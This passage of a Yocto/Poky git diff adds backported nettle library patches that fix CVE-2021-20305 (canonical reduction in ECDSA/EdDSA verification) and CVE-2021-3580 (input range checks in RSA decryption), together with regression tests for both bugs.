struct ecc_modulo *m, mp_limb_t *rp, ++ const mp_limb_t *ap, mp_limb_t *tp); ++ + /* mod q operations. */ + void + ecc_mod_random (const struct ecc_modulo *m, mp_limb_t *xp, +Index: nettle-3.5.1/ecc-j-to-a.c +=================================================================== +--- nettle-3.5.1.orig/ecc-j-to-a.c ++++ nettle-3.5.1/ecc-j-to-a.c +@@ -51,8 +51,6 @@ ecc_j_to_a (const struct ecc_curve *ecc, + #define izBp (scratch + 3*ecc->p.size) + #define tp scratch + +- mp_limb_t cy; +- + if (ecc->use_redc) + { + /* Set v = (r_z / B^2)^-1, +@@ -86,17 +84,14 @@ ecc_j_to_a (const struct ecc_curve *ecc, + ecc_modp_sqr (ecc, iz2p, izp); + } + +- ecc_modp_mul (ecc, iz3p, iz2p, p); +- /* ecc_modp (and ecc_modp_mul) may return a value up to 2p - 1, so +- do a conditional subtraction. */ +- cy = mpn_sub_n (r, iz3p, ecc->p.m, ecc->p.size); +- cnd_copy (cy, r, iz3p, ecc->p.size); ++ ecc_mod_mul_canonical (&ecc->p, r, iz2p, p, iz3p); + + if (op) + { + /* Skip y coordinate */ + if (op > 1) + { ++ mp_limb_t cy; + /* Also reduce the x coordinate mod ecc->q. It should + already be < 2*ecc->q, so one subtraction should + suffice. */ +@@ -106,10 +101,7 @@ ecc_j_to_a (const struct ecc_curve *ecc, + return; + } + ecc_modp_mul (ecc, iz3p, iz2p, izp); +- ecc_modp_mul (ecc, tp, iz3p, p + ecc->p.size); +- /* And a similar subtraction. */ +- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size); +- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size); ++ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, iz3p, p + ecc->p.size, iz3p); + + #undef izp + #undef up +Index: nettle-3.5.1/ecc-mod-arith.c +=================================================================== +--- nettle-3.5.1.orig/ecc-mod-arith.c ++++ nettle-3.5.1/ecc-mod-arith.c +@@ -119,6 +119,30 @@ ecc_mod_mul (const struct ecc_modulo *m, + } + + void ++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp, ++ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp) ++{ ++ mp_limb_t cy; ++ mpn_mul_n (tp + m->size, ap, bp, m->size); ++ m->reduce (m, tp + m->size); ++ ++ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size); ++ cnd_copy (cy, rp, tp + m->size, m->size); ++} ++ ++void ++ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp, ++ const mp_limb_t *ap, mp_limb_t *tp) ++{ ++ mp_limb_t cy; ++ mpn_sqr (tp + m->size, ap, m->size); ++ m->reduce (m, tp + m->size); ++ ++ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size); ++ cnd_copy (cy, rp, tp + m->size, m->size); ++} ++ ++void + ecc_mod_sqr (const struct ecc_modulo *m, mp_limb_t *rp, + const mp_limb_t *ap) + { diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch new file mode 100644 index 0000000000..bb56b14c8c --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch @@ -0,0 +1,53 @@ +Backport of: + +From 971bed6ab4b27014eb23085e8176917e1a096fd5 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= +Date: Sat, 13 Mar 2021 17:26:37 +0100 +Subject: [PATCH] Use ecc_mod_mul_canonical for point comparison. + +* eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical. + +(cherry picked from commit 5b7608fde3a6d2ab82bffb35db1e4e330927c906) + +Upstream-Status: Backport +https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-2.patch +CVE: CVE-2021-20305 dep2 +Signed-off-by: Armin Kuster + +--- + ChangeLog | 4 ++++ + eddsa-verify.c | 9 ++------- + 2 files changed, 6 insertions(+), 7 deletions(-) + +#diff --git a/ChangeLog b/ChangeLog +#index 5cc5c188..2a9217a6 100644 +#--- a/ChangeLog +#+++ b/ChangeLog +#@@ -1,3 +1,7 @@ +#+2021-03-13 Niels Möller +#+ +#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical. +#+ +# 2021-03-11 Niels Möller +# +# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical): +Index: nettle-3.5.1/eddsa-verify.c +=================================================================== +--- nettle-3.5.1.orig/eddsa-verify.c ++++ nettle-3.5.1/eddsa-verify.c +@@ -53,13 +53,8 @@ equal_h (const struct ecc_modulo *p, + #define t0 scratch + #define t1 (scratch + p->size) + +- ecc_mod_mul (p, t0, x1, z2); +- if (mpn_cmp (t0, p->m, p->size) >= 0) +- mpn_sub_n (t0, t0, p->m, p->size); +- +- ecc_mod_mul (p, t1, x2, z1); +- if (mpn_cmp (t1, p->m, p->size) >= 0) +- mpn_sub_n (t1, t1, p->m, p->size); ++ ecc_mod_mul_canonical (p, t0, x1, z2, t0); ++ ecc_mod_mul_canonical (p, t1, x2, z1, t1); + + return mpn_cmp (t0, t1, p->size) == 0; + diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch new file mode 100644 index 0000000000..15a892ecdf --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch @@ -0,0 +1,122 @@ +Backport of: + +From 74ee0e82b6891e090f20723750faeb19064e31b2 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= +Date: Sat, 13 Mar 2021 15:19:19 +0100 +Subject: [PATCH] Fix bug in ecc_ecdsa_verify. + +* ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical +to compute the scalars used for ecc multiplication. +* testsuite/ecdsa-verify-test.c (test_main): Add test case that +triggers an assert on 64-bit platforms, without above fix. +* testsuite/ecdsa-sign-test.c (test_main): Test case generating +the same signature. + +(cherry picked from commit 2397757b3f95fcae1e2d3011bf99ca5b5438378f) + +Upstream-Status: Backport +https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-3.patch +CVE: CVE-2021-20305 dep3 +[Minor fixup on _nettle_secp_224r1] +Signed-off-by: Armin Kuster + +--- + ChangeLog | 10 +++++++++- + ecc-ecdsa-verify.c | 4 ++-- + testsuite/ecdsa-sign-test.c | 13 +++++++++++++ + testsuite/ecdsa-verify-test.c | 20 ++++++++++++++++++++ + 4 files changed, 44 insertions(+), 3 deletions(-) + +#diff --git a/ChangeLog b/ChangeLog +#index 2a9217a6..63848f53 100644 +#--- a/ChangeLog +#+++ b/ChangeLog +#@@ -1,7 +1,15 @@ +# 2021-03-13 Niels Möller +# +#- * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical. +#+ * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical +#+ to compute the scalars used for ecc multiplication. +#+ * testsuite/ecdsa-verify-test.c (test_main): Add test case that +#+ triggers an assert on 64-bit platforms, without above fix. +#+ * testsuite/ecdsa-sign-test.c (test_main): Test case generating +#+ the same signature. +#+ +#+2021-03-13 Niels Möller +# +#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical. +# 2021-03-11 Niels Möller +# +# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical): +Index: nettle-3.5.1/ecc-ecdsa-verify.c +=================================================================== +--- nettle-3.5.1.orig/ecc-ecdsa-verify.c ++++ nettle-3.5.1/ecc-ecdsa-verify.c +@@ -112,10 +112,10 @@ ecc_ecdsa_verify (const struct ecc_curve + + /* u1 = h / s, P1 = u1 * G */ + ecc_hash (&ecc->q, hp, length, digest); +- ecc_modq_mul (ecc, u1, hp, sinv); ++ ecc_mod_mul_canonical (&ecc->q, u1, hp, sinv, u1); + + /* u2 = r / s, P2 = u2 * Y */ +- ecc_modq_mul (ecc, u2, rp, sinv); ++ ecc_mod_mul_canonical (&ecc->q, u2, rp, sinv, u2); + + /* Total storage: 5*ecc->p.size + ecc->mul_itch */ + ecc->mul (ecc, P2, u2, pp, u2 + ecc->p.size); +Index: nettle-3.5.1/testsuite/ecdsa-sign-test.c +=================================================================== +--- nettle-3.5.1.orig/testsuite/ecdsa-sign-test.c ++++ nettle-3.5.1/testsuite/ecdsa-sign-test.c +@@ -58,6 +58,19 @@ test_ecdsa (const struct ecc_curve *ecc, + void + test_main (void) + { ++ /* Producing the signature for corresponding test in ++ ecdsa-verify-test.c, with special u1 and u2. */ ++ test_ecdsa (&_nettle_secp_224r1, ++ "99b5b787484def12894ca507058b3bf5" ++ "43d72d82fa7721d2e805e5e6", ++ "2", ++ SHEX("cdb887ac805a3b42e22d224c85482053" ++ "16c755d4a736bb2032c92553"), ++ "706a46dc76dcb76798e60e6d89474788" ++ "d16dc18032d268fd1a704fa6", /* r */ ++ "3a41e1423b1853e8aa89747b1f987364" ++ "44705d6d6d8371ea1f578f2e"); /* s */ ++ + /* Test cases for the smaller groups, verified with a + proof-of-concept implementation done for Yubico AB. */ + test_ecdsa (&_nettle_secp_192r1, +Index: nettle-3.5.1/testsuite/ecdsa-verify-test.c +=================================================================== +--- nettle-3.5.1.orig/testsuite/ecdsa-verify-test.c ++++ nettle-3.5.1/testsuite/ecdsa-verify-test.c +@@ -81,6 +81,26 @@ test_ecdsa (const struct ecc_curve *ecc, + void + test_main (void) + { ++ /* Corresponds to nonce k = 2 and private key z = ++ 0x99b5b787484def12894ca507058b3bf543d72d82fa7721d2e805e5e6. z and ++ hash are chosen so that intermediate scalars in the verify ++ equations are u1 = 0x6b245680e700, u2 = ++ 259da6542d4ba7d21ad916c3bd57f811. These values require canonical ++ reduction of the scalars. Bug caused by missing canonical ++ reduction reported by Guido Vranken. */ ++ test_ecdsa (&_nettle_secp_224r1, ++ "9e7e6cc6b1bdfa8ee039b66ad85e5490" ++ "7be706a900a3cba1c8fdd014", /* x */ ++ "74855db3f7c1b4097ae095745fc915e3" ++ "8a79d2a1de28f282eafb22ba", /* y */ ++ ++ SHEX("cdb887ac805a3b42e22d224c85482053" ++ "16c755d4a736bb2032c92553"), ++ "706a46dc76dcb76798e60e6d89474788" ++ "d16dc18032d268fd1a704fa6", /* r */ ++ "3a41e1423b1853e8aa89747b1f987364" ++ "44705d6d6d8371ea1f578f2e"); /* s */ ++ + /* From RFC 4754 */ + test_ecdsa (&_nettle_secp_256r1, + "2442A5CC 0ECD015F A3CA31DC 8E2BBC70" diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch new file mode 100644 index 0000000000..54b4fa584c --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch @@ -0,0 +1,48 @@ +Backport of: + +From 51f643eee00e2caa65c8a2f5857f49acdf3ef1ce Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= +Date: Sat, 13 Mar 2021 16:27:50 +0100 +Subject: [PATCH] Ensure ecdsa_sign output is canonically reduced. + +* ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to +canonical range. + +(cherry picked from commit c24b36160dc5303f7541dd9da1429c4046f27398) + +Upstream-Status: Backport +https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-4.patch +CVE: CVE-2021-20305 dep4 +Signed-off-by: Armin Kuster + +--- + ChangeLog | 3 +++ + ecc-ecdsa-sign.c | 3 +-- + 2 files changed, 4 insertions(+), 2 deletions(-) + +#diff --git a/ChangeLog b/ChangeLog +#index 63848f53..fb2d7f66 100644 +#--- a/ChangeLog +#+++ b/ChangeLog +#@@ -1,5 +1,8 @@ +# 2021-03-13 Niels Möller +# +#+ * ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to +#+ canonical range. +#+ +# * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical +# to compute the scalars used for ecc multiplication. +# * testsuite/ecdsa-verify-test.c (test_main): Add test case that +--- a/ecc-ecdsa-sign.c ++++ b/ecc-ecdsa-sign.c +@@ -90,9 +90,8 @@ ecc_ecdsa_sign (const struct ecc_curve * + + ecc_modq_mul (ecc, tp, zp, rp); + ecc_modq_add (ecc, hp, hp, tp); +- ecc_modq_mul (ecc, tp, hp, kinv); ++ ecc_mod_mul_canonical (&ecc->q, sp, hp, kinv, tp); + +- mpn_copyi (sp, tp, ecc->p.size); + #undef P + #undef hp + #undef kinv diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch new file mode 100644 index 0000000000..468ff66266 --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch @@ -0,0 +1,53 @@ +Backport of: + +From ae3801a0e5cce276c270973214385c86048d5f7b Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= +Date: Sat, 13 Mar 2021 16:42:21 +0100 +Subject: [PATCH] Similar fix for eddsa. + +* eddsa-hash.c (_eddsa_hash): Ensure result is canonically +reduced. Two of the three call sites need that. + +(cherry picked from commit d9b564e4b3b3a5691afb9328c7342b3f7ca64288) + + +Upstream-Status: Backport +https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-6.patch +CVE: CVE-2021-20305 +Signed-off-by: Armin Kuster + +--- + ChangeLog | 3 +++ + eddsa-hash.c | 10 +++++++--- + 2 files changed, 10 insertions(+), 3 deletions(-) + +#diff --git a/ChangeLog b/ChangeLog +#index 5f8a22c2..ce330831 100644 +#--- a/ChangeLog +#+++ b/ChangeLog +#@@ -1,5 +1,8 @@ +# 2021-03-13 Niels Möller +# +#+ * eddsa-hash.c (_eddsa_hash): Ensure result is canonically +#+ reduced. Two of the three call sites need that. +#+ +# * ecc-gostdsa-verify.c (ecc_gostdsa_verify): Use ecc_mod_mul_canonical +# to compute the scalars used for ecc multiplication. +# +Index: nettle-3.5.1/eddsa-hash.c +=================================================================== +--- nettle-3.5.1.orig/eddsa-hash.c ++++ nettle-3.5.1/eddsa-hash.c +@@ -46,7 +46,12 @@ void + _eddsa_hash (const struct ecc_modulo *m, + mp_limb_t *rp, const uint8_t *digest) + { ++ mp_limb_t cy; + size_t nbytes = 1 + m->bit_size / 8; + mpn_set_base256_le (rp, 2*m->size, digest, 2*nbytes); + m->mod (m, rp); ++ mpn_copyi (rp + m->size, rp, m->size); ++ /* Ensure canonical reduction. */ ++ cy = mpn_sub_n (rp, rp + m->size, m->m, m->size); ++ cnd_copy (cy, rp, rp + m->size, m->size); + } diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch new file mode 100644 index 0000000000..ac3a638e72 --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch @@ -0,0 +1,277 @@ +From cd6059aebdd3059fbcf674dddb850b821c13b6c2 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= +Date: Tue, 8 Jun 2021 21:31:39 +0200 +Subject: [PATCH 1/2] Change _rsa_sec_compute_root_tr to take a fix input size. + +Improves consistency with _rsa_sec_compute_root, and fixes zero-input bug. + +(cherry picked from commit 485b5e2820a057e873b1ba812fdb39cae4adf98c) + +Upstream-Status: Backport +CVE: CVE-2021-3580 dep#1 +Signed-off-by: Armin Kuster + +--- + ChangeLog | 17 +++++++++- + rsa-decrypt-tr.c | 7 ++--- + rsa-internal.h | 4 +-- + rsa-sec-decrypt.c | 9 ++++-- + rsa-sign-tr.c | 61 +++++++++++++++++------------------- + testsuite/rsa-encrypt-test.c | 14 ++++++++- + 6 files changed, 69 insertions(+), 43 deletions(-) + +Index: nettle-3.5.1/rsa-decrypt-tr.c +=================================================================== +--- nettle-3.5.1.orig/rsa-decrypt-tr.c ++++ nettle-3.5.1/rsa-decrypt-tr.c +@@ -52,14 +52,13 @@ rsa_decrypt_tr(const struct rsa_public_k + mp_size_t key_limb_size; + int res; + +- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size); ++ key_limb_size = mpz_size(pub->n); + + TMP_GMP_ALLOC (m, key_limb_size); + TMP_GMP_ALLOC (em, key->size); ++ mpz_limbs_copy(m, gibberish, key_limb_size); + +- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, +- mpz_limbs_read(gibberish), +- mpz_size(gibberish)); ++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m); + + mpn_get_base256 (em, key->size, m, key_limb_size); + +Index: nettle-3.5.1/rsa-internal.h +=================================================================== +--- nettle-3.5.1.orig/rsa-internal.h ++++ nettle-3.5.1/rsa-internal.h +@@ -78,11 +78,11 @@ _rsa_sec_compute_root(const struct rsa_p + mp_limb_t *scratch); + + /* Safe side-channel silent variant, using RSA blinding, and checking the +- * result after CRT. */ ++ * result after CRT. In-place calls, with x == m, is allowed. */ + int + _rsa_sec_compute_root_tr(const struct rsa_public_key *pub, + const struct rsa_private_key *key, + void *random_ctx, nettle_random_func *random, +- mp_limb_t *x, const mp_limb_t *m, size_t mn); ++ mp_limb_t *x, const mp_limb_t *m); + + #endif /* NETTLE_RSA_INTERNAL_H_INCLUDED */ +Index: nettle-3.5.1/rsa-sec-decrypt.c +=================================================================== +--- nettle-3.5.1.orig/rsa-sec-decrypt.c ++++ nettle-3.5.1/rsa-sec-decrypt.c +@@ -58,9 +58,12 @@ rsa_sec_decrypt(const struct rsa_public_ + TMP_GMP_ALLOC (m, mpz_size(pub->n)); + TMP_GMP_ALLOC (em, key->size); + +- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, +- mpz_limbs_read(gibberish), +- mpz_size(gibberish)); ++ /* We need a copy because m can be shorter than key_size, ++ * but _rsa_sec_compute_root_tr expect all inputs to be ++ * normalized to a key_size long buffer length */ ++ mpz_limbs_copy(m, gibberish, mpz_size(pub->n)); ++ ++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m); + + mpn_get_base256 (em, key->size, m, mpz_size(pub->n)); + +Index: nettle-3.5.1/rsa-sign-tr.c +=================================================================== +--- nettle-3.5.1.orig/rsa-sign-tr.c ++++ nettle-3.5.1/rsa-sign-tr.c +@@ -131,35 +131,34 @@ int + _rsa_sec_compute_root_tr(const struct rsa_public_key *pub, + const struct rsa_private_key *key, + void *random_ctx, nettle_random_func *random, +- mp_limb_t *x, const mp_limb_t *m, size_t mn) ++ mp_limb_t *x, const mp_limb_t *m) + { ++ mp_size_t nn; + mpz_t mz; + mpz_t xz; + int res; + +- mpz_init(mz); + mpz_init(xz); + +- mpn_copyi(mpz_limbs_write(mz, mn), m, mn); +- mpz_limbs_finish(mz, mn); ++ nn = mpz_size (pub->n); + +- res = rsa_compute_root_tr(pub, key, random_ctx, random, xz, mz); ++ res = rsa_compute_root_tr(pub, key, random_ctx, random, xz, ++ mpz_roinit_n(mz, m, nn)); + + if (res) +- mpz_limbs_copy(x, xz, mpz_size(pub->n)); ++ mpz_limbs_copy(x, xz, nn); + +- mpz_clear(mz); + mpz_clear(xz); + return res; + } + #else + /* Blinds m, by computing c = m r^e (mod n), for a random r. Also +- returns the inverse (ri), for use by rsa_unblind. */ ++ returns the inverse (ri), for use by rsa_unblind. Must have c != m, ++ no in-place operation.*/ + static void + rsa_sec_blind (const struct rsa_public_key *pub, + void *random_ctx, nettle_random_func *random, +- mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m, +- mp_size_t mn) ++ mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m) + { + const mp_limb_t *ep = mpz_limbs_read (pub->e); + const mp_limb_t *np = mpz_limbs_read (pub->n); +@@ -177,15 +176,15 @@ rsa_sec_blind (const struct rsa_public_k + + /* c = m*(r^e) mod n */ + itch = mpn_sec_powm_itch(nn, ebn, nn); +- i2 = mpn_sec_mul_itch(nn, mn); ++ i2 = mpn_sec_mul_itch(nn, nn); + itch = MAX(itch, i2); +- i2 = mpn_sec_div_r_itch(nn + mn, nn); ++ i2 = mpn_sec_div_r_itch(2*nn, nn); + itch = MAX(itch, i2); + i2 = mpn_sec_invert_itch(nn); + itch = MAX(itch, i2); + +- TMP_GMP_ALLOC (tp, nn + mn + itch); +- scratch = tp + nn + mn; ++ TMP_GMP_ALLOC (tp, 2*nn + itch); ++ scratch = tp + 2*nn; + + /* ri = r^(-1) */ + do +@@ -198,9 +197,8 @@ rsa_sec_blind (const struct rsa_public_k + while (!mpn_sec_invert (ri, tp, np, nn, 2 * nn * GMP_NUMB_BITS, scratch)); + + mpn_sec_powm (c, rp, nn, ep, ebn, np, nn, scratch); +- /* normally mn == nn, but m can be smaller in some cases */ +- mpn_sec_mul (tp, c, nn, m, mn, scratch); +- mpn_sec_div_r (tp, nn + mn, np, nn, scratch); ++ mpn_sec_mul (tp, c, nn, m, nn, scratch); ++ mpn_sec_div_r (tp, 2*nn, np, nn, scratch); + mpn_copyi(c, tp, nn); + + TMP_GMP_FREE (r); +@@ -208,7 +206,7 @@ rsa_sec_blind (const struct rsa_public_k + TMP_GMP_FREE (tp); + } + +-/* m = c ri mod n */ ++/* m = c ri mod n. Allows x == c. */ + static void + rsa_sec_unblind (const struct rsa_public_key *pub, + mp_limb_t *x, mp_limb_t *ri, const mp_limb_t *c) +@@ -299,7 +297,7 @@ int + _rsa_sec_compute_root_tr(const struct rsa_public_key *pub, + const struct rsa_private_key *key, + void *random_ctx, nettle_random_func *random, +- mp_limb_t *x, const mp_limb_t *m, size_t mn) ++ mp_limb_t *x, const mp_limb_t *m) + { + TMP_GMP_DECL (c, mp_limb_t); + TMP_GMP_DECL (ri, mp_limb_t); +@@ -307,7 +305,7 @@ _rsa_sec_compute_root_tr(const struct rs + size_t key_limb_size; + int ret; + +- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size); ++ key_limb_size = mpz_size(pub->n); + + /* mpz_powm_sec handles only odd moduli. If p, q or n is even, the + key is invalid and rejected by rsa_private_key_prepare. However, +@@ -321,19 +319,18 @@ _rsa_sec_compute_root_tr(const struct rs + } + + assert(mpz_size(pub->n) == key_limb_size); +- assert(mn <= key_limb_size); + + TMP_GMP_ALLOC (c, key_limb_size); + TMP_GMP_ALLOC (ri, key_limb_size); + TMP_GMP_ALLOC (scratch, _rsa_sec_compute_root_itch(key)); + +- rsa_sec_blind (pub, random_ctx, random, x, ri, m, mn); ++ rsa_sec_blind (pub, random_ctx, random, c, ri, m); + +- _rsa_sec_compute_root(key, c, x, scratch); ++ _rsa_sec_compute_root(key, x, c, scratch); + +- ret = rsa_sec_check_root(pub, c, x); ++ ret = rsa_sec_check_root(pub, x, c); + +- rsa_sec_unblind(pub, x, ri, c); ++ rsa_sec_unblind(pub, x, ri, x); + + cnd_mpn_zero(1 - ret, x, key_limb_size); + +@@ -357,17 +354,17 @@ rsa_compute_root_tr(const struct rsa_pub + mpz_t x, const mpz_t m) + { + TMP_GMP_DECL (l, mp_limb_t); ++ mp_size_t nn = mpz_size(pub->n); + int res; + +- mp_size_t l_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size); +- TMP_GMP_ALLOC (l, l_size); ++ TMP_GMP_ALLOC (l, nn); ++ mpz_limbs_copy(l, m, nn); + +- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l, +- mpz_limbs_read(m), mpz_size(m)); ++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l, l); + if (res) { +- mp_limb_t *xp = mpz_limbs_write (x, l_size); +- mpn_copyi (xp, l, l_size); +- mpz_limbs_finish (x, l_size); ++ mp_limb_t *xp = mpz_limbs_write (x, nn); ++ mpn_copyi (xp, l, nn); ++ mpz_limbs_finish (x, nn); + } + + TMP_GMP_FREE (l); +Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c +=================================================================== +--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c ++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c +@@ -19,6 +19,7 @@ test_main(void) + uint8_t after; + + mpz_t gibberish; ++ mpz_t zero; + + rsa_private_key_init(&key); + rsa_public_key_init(&pub); +@@ -101,6 +102,17 @@ test_main(void) + ASSERT(decrypted[decrypted_length] == after); + ASSERT(decrypted[0] == 'A'); + ++ /* Test zero input. */ ++ mpz_init_set_ui (zero, 0); ++ decrypted_length = msg_length; ++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero)); ++ ASSERT(!rsa_decrypt_tr(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ &decrypted_length, decrypted, zero)); ++ ASSERT(!rsa_sec_decrypt(&pub, &key, ++ &lfib, (nettle_random_func *) knuth_lfib_random, ++ decrypted_length, decrypted, zero)); ++ ASSERT(decrypted_length == msg_length); + + /* Test invalid key. */ + mpz_add_ui (key.q, key.q, 2); +@@ -112,6 +124,6 @@ test_main(void) + rsa_private_key_clear(&key); + rsa_public_key_clear(&pub); + mpz_clear(gibberish); ++ mpz_clear(zero); + free(decrypted); + } +- diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch new file mode 100644 index 0000000000..18e952ddf7 --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch @@ -0,0 +1,163 @@ +From c80961c646b0962ab152619ac0a7c6a21850a380 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= +Date: Tue, 8 Jun 2021 21:32:38 +0200 +Subject: [PATCH 2/2] Add input check to rsa_decrypt family of functions. + +(cherry picked from commit 0ad0b5df315665250dfdaa4a1e087f4799edaefe) + +Upstream-Status: Backport +CVE: CVE-2021-3580 +Signed-off-by: Armin Kuster + +--- + ChangeLog | 10 +++++++++- + rsa-decrypt-tr.c | 4 ++++ + rsa-decrypt.c | 10 ++++++++++ + rsa-sec-decrypt.c | 4 ++++ + rsa.h | 5 +++-- + testsuite/rsa-encrypt-test.c | 38 ++++++++++++++++++++++++++++++------ + 6 files changed, 62 insertions(+), 9 deletions(-) + +Index: nettle-3.5.1/rsa-decrypt-tr.c +=================================================================== +--- nettle-3.5.1.orig/rsa-decrypt-tr.c ++++ nettle-3.5.1/rsa-decrypt-tr.c +@@ -52,6 +52,10 @@ rsa_decrypt_tr(const struct rsa_public_k + mp_size_t key_limb_size; + int res; + ++ /* First check that input is in range. */ ++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0) ++ return 0; ++ + key_limb_size = mpz_size(pub->n); + + TMP_GMP_ALLOC (m, key_limb_size); +Index: nettle-3.5.1/rsa-decrypt.c +=================================================================== +--- nettle-3.5.1.orig/rsa-decrypt.c ++++ nettle-3.5.1/rsa-decrypt.c +@@ -48,6 +48,16 @@ rsa_decrypt(const struct rsa_private_key + int res; + + mpz_init(m); ++ ++ /* First check that input is in range. Since we don't have the ++ public key available here, we need to reconstruct n. */ ++ mpz_mul (m, key->p, key->q); ++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, m) >= 0) ++ { ++ mpz_clear (m); ++ return 0; ++ } ++ + rsa_compute_root(key, m, gibberish); + + res = pkcs1_decrypt (key->size, m, length, message); +Index: nettle-3.5.1/rsa-sec-decrypt.c +=================================================================== +--- nettle-3.5.1.orig/rsa-sec-decrypt.c ++++ nettle-3.5.1/rsa-sec-decrypt.c +@@ -55,6 +55,10 @@ rsa_sec_decrypt(const struct rsa_public_ + TMP_GMP_DECL (em, uint8_t); + int res; + ++ /* First check that input is in range. */ ++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0) ++ return 0; ++ + TMP_GMP_ALLOC (m, mpz_size(pub->n)); + TMP_GMP_ALLOC (em, key->size); + +Index: nettle-3.5.1/rsa.h +=================================================================== +--- nettle-3.5.1.orig/rsa.h ++++ nettle-3.5.1/rsa.h +@@ -428,13 +428,14 @@ rsa_sec_decrypt(const struct rsa_public_ + size_t length, uint8_t *message, + const mpz_t gibberish); + +-/* Compute x, the e:th root of m. Calling it with x == m is allowed. */ ++/* Compute x, the e:th root of m. Calling it with x == m is allowed. ++ It is required that 0 <= m < n. */ + void + rsa_compute_root(const struct rsa_private_key *key, + mpz_t x, const mpz_t m); + + /* Safer variant, using RSA blinding, and checking the result after +- CRT. */ ++ CRT. It is required that 0 <= m < n. */ + int + rsa_compute_root_tr(const struct rsa_public_key *pub, + const struct rsa_private_key *key, +Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c +=================================================================== +--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c ++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c +@@ -19,11 +19,12 @@ test_main(void) + uint8_t after; + + mpz_t gibberish; +- mpz_t zero; ++ mpz_t bad_input; + + rsa_private_key_init(&key); + rsa_public_key_init(&pub); + mpz_init(gibberish); ++ mpz_init(bad_input); + + knuth_lfib_init(&lfib, 17); + +@@ -103,15 +104,40 @@ test_main(void) + ASSERT(decrypted[0] == 'A'); + + /* Test zero input. */ +- 